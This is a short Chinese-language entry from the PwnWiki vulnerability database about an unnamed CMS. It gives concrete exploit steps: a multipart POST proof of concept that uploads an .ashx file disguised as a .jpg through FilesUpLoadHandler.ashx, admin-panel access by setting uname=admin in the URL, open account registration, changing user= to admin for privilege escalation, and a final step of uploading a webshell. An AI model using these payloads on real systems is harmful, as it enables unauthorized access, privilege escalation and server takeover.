免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
任意文件上传漏洞
/SmartMobile/micropage/UpLoad/FilesUpLoadHandler.ashx
使用该Payload后返回任意内容即漏洞存在。
POC
Post: ------WebKitFormBoundaryxJBEcLK1xdylqBhP Content-Disposition: form-data;name="fileType" 2222.ashx ------WebKitFormBoundaryxJBEcLK1xdylqBhP Content-Disposition: form-data;name="file"; filename="2222.jpg" Content-Type: image/jpeg 1 ------WebKitFormBoundaryxJBEcLK1xdylqBhP—
通过构造的POC成功上传文件。
未经授权访问漏洞
/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0
直接进入管理员后台,需要登录的提示绑定账号,这时候需要注册一个账号登录。
任意用户注册漏洞
Module/SSO/SJS_Register.aspx
漏洞利用
注册成功后,登录到用户主页
http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=test123
修改user=admin
,发现界面发生变化,用户变为管理员
http://xxx.xxx.xxx/Module/PersonalCenter/Default.aspx?user=admin
进入管理员后台页面
http://xxx.xxx.xxx/SmartMobile/MobileIndex.aspx?uname=admin&orgId=0
Getshell
CMS图片上传没有过滤,修改fileType并且上传Webshell即可。
免费、自由、人人可编辑的漏洞库--PwnWiki.com